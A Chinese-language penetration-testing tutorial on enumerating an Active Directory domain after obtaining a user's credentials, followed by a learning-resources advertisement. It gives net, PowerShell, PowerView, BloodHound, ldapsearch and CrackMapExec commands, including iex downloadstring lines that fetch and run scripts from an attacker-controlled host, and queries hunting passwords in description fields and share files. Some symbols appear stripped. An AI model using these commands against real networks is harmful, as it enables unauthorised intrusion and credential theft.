后,如何快速摸清家底?)
域滲透入門拿到域賬號(hào)后如何快速摸清家底收藏版本文介紹了在域滲透中拿到域用戶憑證后的首要任務(wù)——信息收集。通過使用Windows原生命令、PowerShell遠(yuǎn)程加載腳本以及PowerView、BloodHound等工具詳細(xì)闡述了如何快速摸清域環(huán)境中的用戶、計(jì)算機(jī)、服務(wù)等信息。文章強(qiáng)調(diào)了信息收集的重要性并提供了實(shí)用的命令和查詢幫助初學(xué)者更好地理解和應(yīng)用域滲透技術(shù)。域滲透基礎(chǔ)二拿到域賬號(hào)后第一件事——摸清家底上一篇文章我們講了域的基本概念域像一個(gè)小區(qū)的門禁系統(tǒng)域控制器DC是發(fā)門禁卡的保安室。現(xiàn)在假設(shè)你通過某種方式拿到了一個(gè)域用戶的賬號(hào)密碼——可能是釣魚郵件、WebShell 拿到了某臺(tái)機(jī)器的權(quán)限、或者對(duì)方不小心把密碼貼在了屏幕上。你有了一個(gè)普通住戶的門禁卡接下來怎么辦別急著跑 exploit先摸清這個(gè)小區(qū)長什么樣。域滲透有一條鐵律信息收集的深度決定你能走多遠(yuǎn)。 你不了解域里有什么用戶、什么機(jī)器、什么服務(wù)就找不到攻擊的方向。盲目跑 exploit 就像蒙著眼睛闖迷宮——大概率撞墻。本文的目標(biāo)拿到一個(gè)域用戶憑據(jù)后用現(xiàn)有工具最快摸清域環(huán)境。一、在原生命令中開始偵察如果你是 Windows 用戶在域環(huán)境中即使被限制了 exe 和 PowerShell 運(yùn)行策略net命令永遠(yuǎn)是能用的。它是操作系統(tǒng)的原生組件殺軟不會(huì)攔它、組策略不會(huì)禁它。以下命令是你能用到的最穩(wěn)定的偵察手段# 我是誰——看當(dāng)前用戶信息 whoami # 當(dāng)前用戶在哪些組里 whoami /groups # 域名叫什么 echo %USERDOMAIN% # 域控在哪兒 nltest /dclist:DOMAIN_NAME # 列出 Domain Admins 組成員 net group Domain Admins /domain # 查看域控列表更快、更準(zhǔn) nltest /dclist:CONTOSO # 查看域信任關(guān)系如果有跨域 nltest /domain_trusts這幾個(gè)命令能告訴你什么你的賬號(hào)在什么組里——如果你在#ote Desktop Users組可以直接 RDP 到服務(wù)器在Server Operators則可以管理域控上的服務(wù)域控的 IP——后續(xù)所有攻擊的目標(biāo)誰是域管理員——你的終極目標(biāo)是否存在跨域信任大網(wǎng)還有更大的網(wǎng)一條很實(shí)用的數(shù)據(jù)清理小技巧 有些管理員會(huì)在用戶的 Description 字段里寫密碼。上一篇文章已經(jīng)提過再次強(qiáng)調(diào)——不要忘記檢查# 查看當(dāng)前用戶信息包括描述字段 net user %USERNAME% /domain二、PowerShell 遠(yuǎn)程加載——不落地的信息收集如果你的目標(biāo)機(jī)允許 PowerShell 運(yùn)行大多數(shù)情況允許PowerShell 遠(yuǎn)程加載腳本是域滲透中最實(shí)用的偵察手段。核心思路不從宿主機(jī)磁盤寫文件直接從你的 Kali HTTP 服務(wù)加載腳本到內(nèi)存。2.1 用原生 PowerShell 命令枚舉# 獲取域信息 Get-ADDomain # 列出所有域用戶 Get-ADUser -Filter * -Properties * | ft Name,SamAccountName,Description,Enabled # 列出所有加入域的計(jì)算機(jī) Get-ADComputer -Filter * -Properties * | ft Name,OperatingSystem,Enabled # 查找 Domain Admins 組成員 Get-ADGroupMember -Identity Domain Admins # 查看所有域組 Get-ADGroup -Filter * | ft Name,GroupCategory,GroupScope # 查找所有 SPN 注冊(cè)用戶為后文 Kerberoasting 做準(zhǔn)備 Get-ADUser -Filter {ServicePrincipalName -ne $null} -Properties ServicePrincipalName為什么Get-ADUser和Get-ADComputer好用 它們直接調(diào)用 AD 的 LDAP 接口查詢域控返回的數(shù)據(jù)比net命令更全——比如可以篩選啟用的用戶、看用戶最后登錄時(shí)間、看描述字段。2.2 ADSI 適配器——沒 RSAT 工具時(shí)的替代方案如果目標(biāo)機(jī)沒有安裝 Active Directory 模塊Windows 默認(rèn)沒有需要安裝 RSAT可以用 ADSI 適配器# 創(chuàng)建一個(gè) DirectorySearcher 對(duì)象 $searcher [ADSISearcher](objectClassuser) $searcher.PageSize 1000 $searcher.FindAll() | ForEach-Object { $_.Properties } # 列出所有域計(jì)算機(jī) $searcher [ADSISearcher](objectClasscomputer) $searcher.PageSize 1000 $searcher.FindAll() | ForEach-Object { $_.Properties.dnshostname }這段代碼不需要額外安裝任何東西是所有 Windows 域成員機(jī)器上都能跑的原生方法。三、PowerView——域枚舉的瑞士軍刀PowerView 是 PowerSploit 框架中最常用的 AD 枚舉腳本。它的厲害之處在于已經(jīng)把最常查的那些東西做成了簡短的函數(shù)。你的操作流程Kali 上起一個(gè) HTTP 服務(wù)靶機(jī)上用內(nèi)存加載。在 Kali 上# 準(zhǔn)備 PowerView 腳本 wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 # 如果你在內(nèi)網(wǎng)無法出網(wǎng)事先準(zhǔn)備好腳本文件 python3 -m http.server 80在目標(biāo)機(jī)Windows上# 內(nèi)存加載 PowerView iex (new-object net.webclient).downloadstring(http://YOUR_IP/PowerView.ps1) # 拿到基礎(chǔ)域信息 Get-NetDomain Get-NetDomainController # 枚舉所有域用戶選出最有價(jià)值的屬性 Get-NetUser | select samaccountname, description, lastlogontimestamp, serviceprincipalname # 枚舉所有域計(jì)算機(jī) Get-NetComputer | select dnshostname, operatingsystem, ipaddress # 枚舉所有域組 Get-NetGroup | select name # 查看指定組的成員 Get-NetGroupMember Domain Admins # 查找有 SPN 的用戶為 Kerberoasting 提前準(zhǔn)備 Get-NetUser -SPN | select samaccountname, serviceprincipalname # 搜管理員在用戶描述里寫的密碼 Get-NetUser -LDAPFilter (description*pass*) | select samaccountname, description Get-NetUser -LDAPFilter (description*pwd*) | select samaccountname, descriptionPowerView 的最大價(jià)值 把幾十行 ADSI 代碼封裝成一個(gè)函數(shù)。你不需要記住 LDAP 查詢語法只需要記住 Get-NetUser、Get-NetComputer、Get-NetGroup 這幾個(gè)核心函數(shù)就夠了。PowerView 的幾個(gè)救急用法# 找哪些用戶是本地管理員需要先拿到目標(biāo)機(jī)的管理員權(quán)限 Get-NetLocalGroup -ComputerName TARGET # 找哪些用戶可以通過 RDP 登錄 Get-NetLocalGroup -ComputerName TARGET |? {$_.AccountName -like *#ote Desktop*} # 查找文件服務(wù)器上的敏感文件 Get-ChildItem -Path //FILE_SERVER/Share -Recurse -Include *pass*.*, *cred*.*, *config*.*四、BloodHound——一張圖看清所有路徑PowerView 給出的數(shù)據(jù)是文本列表——你看到 500 個(gè)用戶、50 臺(tái)機(jī)器、20 個(gè)組但不知道它們之間是怎么關(guān)聯(lián)的。BloodHound 解決的就是可視化攻擊路徑的問題。工作流程第一步Kali 上啟動(dòng) neo4j 數(shù)據(jù)庫 BloodHound GUIsudo neo4j start # 默認(rèn)用戶名密碼 neo4j / neo4j # 瀏覽器訪問 http://localhost:7474 改密碼 bloodhound --no-sandbox第二步在靶機(jī)上收集數(shù)據(jù)# 用 SharpHound.exe需要上傳到靶機(jī) SharpHound.exe -c All # 或者用 PowerShell 版本不落盤 iex (new-object net.webclient).downloadstring(http://YOUR_IP/SharpHound.ps1) Invoke-BloodHound -CollectionMethod AllSharpHound 會(huì)將收集到的數(shù)據(jù)打包成日期_BloodHound.zip。第三步把 zip 文件傳到 Kali拖進(jìn) BloodHound GUI# 把 zip 拖進(jìn) BloodHound 窗口即可自動(dòng)導(dǎo)入 # 然后使用預(yù)置查詢或自定義查詢必用的四個(gè)預(yù)置查詢1. Find all Domain Admins —— 誰是域管理員。就這幾個(gè)人他們是你的最終目標(biāo)2. Shortest Paths to Domain Admins from Owned Principals —— 我當(dāng)前用戶到域管理員的最短路徑。這是你最先要看的內(nèi)容。如果數(shù)據(jù)庫里已經(jīng)有 50 個(gè)用戶但你和域管之間差了 8 條 ACL這條路徑值得先走3. Find Computers where Domain Users are Local Admin —— 域用戶在哪臺(tái)機(jī)器上是本地管理員。這是最常用的橫向移動(dòng)跳板查詢4. Find all users with SPN —— 所有注冊(cè)了 SPN 的用戶。這就是 Kerberoasting 的攻擊目標(biāo)BloodHound 自定義查詢預(yù)置查詢不夠用的時(shí)候可以寫自定義 Cypher 查詢BloodHound 的查詢語言// 查找所有可以 RDP 到域控的用戶 MATCH p(u:User)-[:CanRDP]-(c:Computer {name:DC.CONTOSO.LOCAL}) RETURN p // 查找 Domain Admins 組成員但在非域控上有會(huì)話的用戶 // 這意味著這些域管賬號(hào)的憑據(jù)可能緩存到其他機(jī)器上 MATCH p(u:User)-[:MemberOf]-(g:Group {name:DOMAIN ADMINSCONTOSO.LOCAL}) MATCH (c:Computer)-[:HasSession]-(u) WHERE NOT c.name CONTAINS DC RETURN c.name, u.nameBloodHound 的三個(gè)核心概念節(jié)點(diǎn)Node用戶、計(jì)算機(jī)、組、域邊Edge關(guān)系MemberOf、AdminTo、HasSession、CanRDP 等路徑Path從一個(gè)節(jié)點(diǎn)到另一個(gè)節(jié)點(diǎn)的關(guān)系鏈條你不需要一下子搞懂所有邊類型。先會(huì)用前四個(gè)預(yù)置查詢?cè)诿看螠y試中慢慢熟悉其他邊。五、從 Kali 端直接用工具枚舉如果目標(biāo)網(wǎng)絡(luò)允許從 Kali 直接訪問域內(nèi)機(jī)器OSCP 考試就是這樣你甚至不需要上傳腳本到靶機(jī)。# 用 LDAP 查詢所有域用戶 ldapsearch -H ldap://DC_IP:389 -x / -D DOMAIN/USER -w PASSWORD / -b DCDOMAIN,DCLOCAL / -s sub (objectClassuser) sAMAccountName userPrincipalName description # 用 CME 快速查看域信息 crackmapexec smb DC_IP -u USER -p PASSWORD -d DOMAIN # 用 CME 枚舉域用戶 crackmapexec smb DC_IP -u USER -p PASSWORD -d DOMAIN --users # 用 CME 枚舉 SMB 共享看看域控上有沒有暴露的共享文件夾 crackmapexec smb DC_IP -u USER -p PASSWORD -d DOMAIN --shares # 用 enum4linux-ng 枚舉比 CME 更細(xì)粒度的 SMB 枚舉 enum4linux-ng -u USER -p PASSWORD -d DOMAIN DC_IPCME 和 enum4linux-ng 的對(duì)比CME更快輸出簡潔適合批量掃描。--users、--groups、--shares、--pass-pol四個(gè)參數(shù)基本覆蓋了枚舉需求enum4linux-ng輸出更詳細(xì)包含用戶 SID、組描述、密碼策略的解析。適合在一臺(tái)機(jī)器上做深入偵察六、典型枚舉流程總結(jié)Step 1確認(rèn)憑據(jù)有效 → crackmapexec smb DC_IP -u USER -p PASS -d DOMAIN → 看輸出是否為 [] 綠色 Step 2獲取域基本信息 → CME --users 看所有用戶 → CME --groups 看所有組 → CME --shares 看可讀共享 Step 3排查高價(jià)值信息 → Description 字段查密碼 → SPN 注冊(cè)用戶為下一階段準(zhǔn)備 → 哪些用戶是 Domain Admins Step 4安裝 BloodHound如果方向不明確 → 看 Shortest Paths to Domain Admins → 找 Domain Users 是本地管理員的機(jī)器 Step 5整理結(jié)果 → 梳理哪些用戶可能是弱密碼用戶名像密碼的、名字縮寫加年份的 → 標(biāo)記所有 SPN 用戶 → 確認(rèn)下一階段使用的攻擊技術(shù)這個(gè)流程走完你對(duì)域的家底應(yīng)該已經(jīng)有了清晰的認(rèn)識(shí)。下一篇文章會(huì)用這些信息開始發(fā)力的地方——憑據(jù)攻擊。工具總結(jié)表階段工具命令推薦場景快速確認(rèn)憑據(jù)CrackMapExeccme smb DC -u USER -p PASS最優(yōu)先先確認(rèn)賬號(hào)有效域用戶枚舉CMEcme smb DC --users快速獲取用戶列表域用戶枚舉詳細(xì)ldapsearchldapsearch -H ldap://DC ...需要更多用戶屬性時(shí)域組枚舉CMEcme smb DC --groups快速看所有組SMB 共享枚舉CMEcme smb DC --shares看域控暴露的文件夾密碼策略查詢CMEcme smb DC --pass-pol判斷能否做密碼噴灑深度 SMB 枚舉enum4linux-ngenum4linux-ng -u USER ...需要用戶 SID 等細(xì)節(jié)AD 枚舉腳本PowerViewGet-NetUserGet-NetComputer靶機(jī)上交互式偵察攻擊路徑可視化BloodHoundSharpHound 抓數(shù)據(jù) → GUI 分析方向不明時(shí)找最短路徑往期推薦滲透測試技巧十七| SSRF攻擊全攻略上原理、利用與繞過滲透測試技巧十八| SSRF攻擊全攻略下深入利用與實(shí)戰(zhàn)滲透測試技巧十九|文件上傳繞過全手法上滲透測試技巧二十|文件上傳繞過全手法下滲透測試技巧二十一Hash密碼獲取與破解上滲透測試技巧二十二| Hash密碼獲取與破解下[滲透測試技巧二十三| MSSQL 數(shù)據(jù)庫滲透測試](https://mp.weixin.qq.com/s?__bizMzY4NzI2NTczOQmid224文章來自網(wǎng)上侵權(quán)請(qǐng)聯(lián)系博主互動(dòng)話題如果你對(duì)網(wǎng)絡(luò)攻防技術(shù)感興趣想學(xué)習(xí)更多網(wǎng)安方面的知識(shí)和工具可以看看以下題外話題外話黑客/網(wǎng)絡(luò)安全學(xué)習(xí)路線今天只要你給我的文章點(diǎn)贊我私藏的網(wǎng)安學(xué)習(xí)資料一樣免費(fèi)共享給你們來看看有哪些東西。網(wǎng)絡(luò)安全學(xué)習(xí)資源分享:下面給大家分享一份2026最新版的網(wǎng)絡(luò)安全學(xué)習(xí)路線資料幫助新人小白更系統(tǒng)、更快速的學(xué)習(xí)黑客技術(shù)一、2026最新網(wǎng)絡(luò)安全學(xué)習(xí)路線一個(gè)明確的學(xué)習(xí)路線可以幫助新人了解從哪里開始按照什么順序?qū)W習(xí)以及需要掌握哪些知識(shí)點(diǎn)。對(duì)于從來沒有接觸過網(wǎng)絡(luò)安全的同學(xué)我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長路線圖學(xué)習(xí)規(guī)劃。可以說是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線大家跟著這個(gè)大的方向?qū)W習(xí)準(zhǔn)沒問題。**讀者福利 |***CSDN大禮包《網(wǎng)絡(luò)安全入門進(jìn)階學(xué)習(xí)資源包》免費(fèi)分享 *安全鏈接放心點(diǎn)擊我們把學(xué)習(xí)路線分成L1到L4四個(gè)階段一步步帶你從入門到進(jìn)階從理論到實(shí)戰(zhàn)。L1級(jí)別:網(wǎng)絡(luò)安全的基礎(chǔ)入門L1階段我們會(huì)去了解計(jì)算機(jī)網(wǎng)絡(luò)的基礎(chǔ)知識(shí)以及網(wǎng)絡(luò)安全在行業(yè)的應(yīng)用和分析學(xué)習(xí)理解安全基礎(chǔ)的核心原理關(guān)鍵技術(shù)以及PHP編程基礎(chǔ)通過證書考試可以獲得NISP/CISP。可就業(yè)安全運(yùn)維工程師、等保測評(píng)工程師。L2級(jí)別網(wǎng)絡(luò)安全的技術(shù)進(jìn)階L2階段我們會(huì)去學(xué)習(xí)滲透測試包括情報(bào)收集、弱口令與口令爆破以及各大類型漏洞還有漏洞挖掘和安全檢查項(xiàng)目可參加CISP-PTE證書考試。L3級(jí)別網(wǎng)絡(luò)安全的高階提升L3階段我們會(huì)去學(xué)習(xí)反序列漏洞、RCE漏洞也會(huì)學(xué)習(xí)到內(nèi)網(wǎng)滲透實(shí)戰(zhàn)、靶場實(shí)戰(zhàn)和技術(shù)提取技術(shù)系統(tǒng)學(xué)習(xí)Python編程和實(shí)戰(zhàn)。參加CISP-PTE考試。L4級(jí)別網(wǎng)絡(luò)安全的項(xiàng)目實(shí)戰(zhàn)L4階段我們會(huì)更加深入進(jìn)行實(shí)戰(zhàn)訓(xùn)練包括代碼審計(jì)、應(yīng)急響應(yīng)、紅藍(lán)對(duì)抗以及SRC的挖掘技術(shù)。并學(xué)習(xí)CTF奪旗賽的要點(diǎn)和刷題整個(gè)網(wǎng)絡(luò)安全學(xué)習(xí)路線L1主要是對(duì)計(jì)算機(jī)網(wǎng)絡(luò)安全的理論基礎(chǔ)的一個(gè)學(xué)習(xí)掌握而L3 L4更多的是通過項(xiàng)目實(shí)戰(zhàn)來掌握核心技術(shù)針對(duì)以上網(wǎng)安的學(xué)習(xí)路線我們也整理了對(duì)應(yīng)的學(xué)習(xí)視頻教程和配套的學(xué)習(xí)資料。二、技術(shù)文檔和經(jīng)典PDF書籍書籍和學(xué)習(xí)文檔資料是學(xué)習(xí)網(wǎng)絡(luò)安全過程中必不可少的我自己整理技術(shù)文檔包括我參加大型網(wǎng)安行動(dòng)、CTF和挖SRC漏洞的經(jīng)驗(yàn)和技術(shù)要點(diǎn)電子書也有200多本書籍含電子版PDF三、網(wǎng)絡(luò)安全視頻教程對(duì)于很多自學(xué)或者沒有基礎(chǔ)的同學(xué)來說書籍這些純文字類的學(xué)習(xí)教材會(huì)覺得比較晦澀難以理解因此我們提供了豐富的網(wǎng)安視頻教程以動(dòng)態(tài)、形象的方式展示技術(shù)概念幫助你更快、更輕松地掌握核心知識(shí)。網(wǎng)上雖然也有很多的學(xué)習(xí)資源但基本上都?xì)埲辈蝗倪@是我自己錄的網(wǎng)安視頻教程上面路線圖的每一個(gè)知識(shí)點(diǎn)我都有配套的視頻講解。四、網(wǎng)絡(luò)安全護(hù)網(wǎng)行動(dòng)/CTF比賽學(xué)以致用當(dāng)你的理論知識(shí)積累到一定程度就需要通過項(xiàng)目實(shí)戰(zhàn)在實(shí)際操作中檢驗(yàn)和鞏固你所學(xué)到的知識(shí)同時(shí)為你找工作和職業(yè)發(fā)展打下堅(jiān)實(shí)的基礎(chǔ)。五、網(wǎng)絡(luò)安全工具包、面試題和源碼“工欲善其事必先利其器”我為大家總結(jié)出了最受歡迎的幾十款款黑客工具。涉及范圍主要集中在 信息收集、Android黑客工具、自動(dòng)化工具、網(wǎng)絡(luò)釣魚等感興趣的同學(xué)不容錯(cuò)過。面試不僅是技術(shù)的較量更需要充分的準(zhǔn)備。在你已經(jīng)掌握了技術(shù)之后就需要開始準(zhǔn)備面試我們將提供精心整理的網(wǎng)安面試題庫涵蓋當(dāng)前面試中可能遇到的各種技術(shù)問題讓你在面試中游刃有余。如果你是要找網(wǎng)安方面的工作它們絕對(duì)能幫你大忙。這些題目都是大家在面試深信服、奇安信、騰訊或者其它大廠面試時(shí)經(jīng)常遇到的如果大家有好的題目或者好的見解歡迎分享。參考解析深信服官網(wǎng)、奇安信官網(wǎng)、Freebuf、csdn等內(nèi)容特點(diǎn)條理清晰含圖像化表示更加易懂。內(nèi)容概要包括 內(nèi)網(wǎng)、操作系統(tǒng)、協(xié)議、滲透測試、安服、漏洞、注入、XSS、CSRF、SSRF、文件上傳、文件下載、文件包含、XXE、邏輯漏洞、工具、SQLmap、NMAP、BP、MSF…**讀者福利 |***CSDN大禮包《網(wǎng)絡(luò)安全入門進(jìn)階學(xué)習(xí)資源包》免費(fèi)分享 *安全鏈接放心點(diǎn)擊